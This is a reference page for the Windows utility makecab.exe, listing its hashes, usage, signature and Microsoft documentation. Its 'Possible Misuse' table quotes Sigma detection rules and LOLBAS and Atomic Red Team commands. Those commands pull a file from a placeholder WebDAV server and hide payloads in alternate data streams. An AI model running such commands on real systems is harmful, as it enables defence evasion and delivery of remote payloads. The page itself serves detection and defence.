makecab.exe
- File Path:
C:\Windows\SysWOW64\makecab.exe - Description: Microsoft Cabinet Maker
Hashes
| Type | Hash |
|---|---|
| MD5 | C6C9DD27A824F361E3072AAB962CBA95 |
| SHA1 | 7B0BD3D654951E8ACB49BDD13B4D67F7351EC9C2 |
| SHA256 | 6FE68E81DA381F3BD1852E18D9223F73D453DD08A9C076B10C3852A1381D802E |
| SHA384 | C5CA475F8197822B63EE41488F4146257B563650C5F845C04D3BC1C775F56B6141F6502D89652C02492E040DA9B805E2 |
| SHA512 | 99CEAFA64687B0A46492180BBECD01DD9386A1483FFA4287DB48168FFD31155C0C854DBD488E4DD0BD9252B140404A643E458DABA9D5860498393E9D0319F783 |
| SSDEEP | 1536:/HETQm8UMt6F0DrDwjM/b6spLZhOVlFeIBDrBP5+hXoL0ghgTtpnIKXUrvoYQYva:/ETQlUMt6F0DrDwjM/b6spLZhOVlFeI+ |
| IMP | DB419917F8DBA7D951EB3BCBFC2572AA |
| PESHA1 | 9F83586C6C3CC824C234E484FAFBDC0754CD1F21 |
| PE256 | 981929DA01127F83D2220851677B473279AE16D38F644E3564BED2A15805DD89 |
Runtime Data
Usage (stdout):
Cabinet Maker - Lossless Data Compression Tool
MAKECAB [/V[n]] [/D var=value ...] [/L dir] source [destination]
MAKECAB [/V[n]] [/D var=value ...] /F directive_file [...]
source File to compress.
destination File name to give compressed file. If omitted, the
last character of the source file name is replaced
with an underscore (_) and used as the destination.
/F directives A file with MakeCAB directives (may be repeated). Refer to
Microsoft Cabinet SDK for information on directive_file.
/D var=value Defines variable with specified value.
/L dir Location to place destination (default is current directory).
/V[n] Verbosity level (1..3).
Loaded Modules:
| Path |
|---|
| C:\Windows\SYSTEM32\ntdll.dll |
| C:\Windows\System32\wow64.dll |
| C:\Windows\System32\wow64cpu.dll |
| C:\Windows\System32\wow64win.dll |
| C:\Windows\SysWOW64\makecab.exe |
Signature
- Status: Signature verified.
- Serial:
3300000266BD1580EFA75CD6D3000000000266 - Thumbprint:
A4341B9FD50FB9964283220A36A1EF6F6FAA7840 - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: makecab.exe
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 5.00 (WinBuild.160101.0800)
- Product Version: 5.00
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 32-bit
File Scan
- VirusTotal Detections: 0/72
- VirusTotal Link: https://www.virustotal.com/gui/file/6fe68e81da381f3bd1852e18d9223f73d453dd08a9c076b10c3852a1381d802e/detection/
Possible Misuse
The following table contains possible examples of makecab.exe being misused. While makecab.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | sysmon_suspicious_remote_thread.yml | - '\makecab.exe' |
DRL 1.0 |
| sigma | proc_creation_win_alternate_data_streams.yml | - 'makecab ' |
DRL 1.0 |
| sigma | proc_creation_win_apt_hafnium.yml | Image\|endswith: '\makecab.exe' |
DRL 1.0 |
| LOLBAS | Makecab.yml | Name: Makecab.exe |
|
| LOLBAS | Makecab.yml | - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab |
|
| LOLBAS | Makecab.yml | - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab |
|
| LOLBAS | Makecab.yml | - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab |
|
| LOLBAS | Makecab.yml | - Path: C:\Windows\System32\makecab.exe |
|
| LOLBAS | Makecab.yml | - Path: C:\Windows\SysWOW64\makecab.exe |
|
| LOLBAS | Makecab.yml | - IOC: Makecab retrieving files from Internet |
|
| LOLBAS | Makecab.yml | - IOC: Makecab storing data into alternate data streams |
|
| atomic-red-team | T1564.004.md | makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab | MIT License. © 2018 Red Canary |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
makecab
Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012
Package existing files into a cabinet (.cab) file.
[!NOTE] This command is the same as the diantz command.
Syntax
makecab [/v[n]] [/d var=<value> ...] [/l <dir>] <source> [<destination>]
makecab [/v[<n>]] [/d var=<value> ...] /f <directives_file> [...]
Parameters
| Parameter | Description |
|---|---|
<source> |
File to compress. |
<destination> |
File name to give compressed file. If omitted, the last character of the source file name is replaced with an underscore (_) and used as the destination. |
/f <directives_file> |
A file with makecab directives (may be repeated). |
/d var=<value> |
Defines variable with specified value. |
/l <dir> |
Location to place destination (default is current directory). |
/v[<n>] |
Set debugging verbosity level (0=none,…,3=full). |
| /? | Displays help at the command prompt. |
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.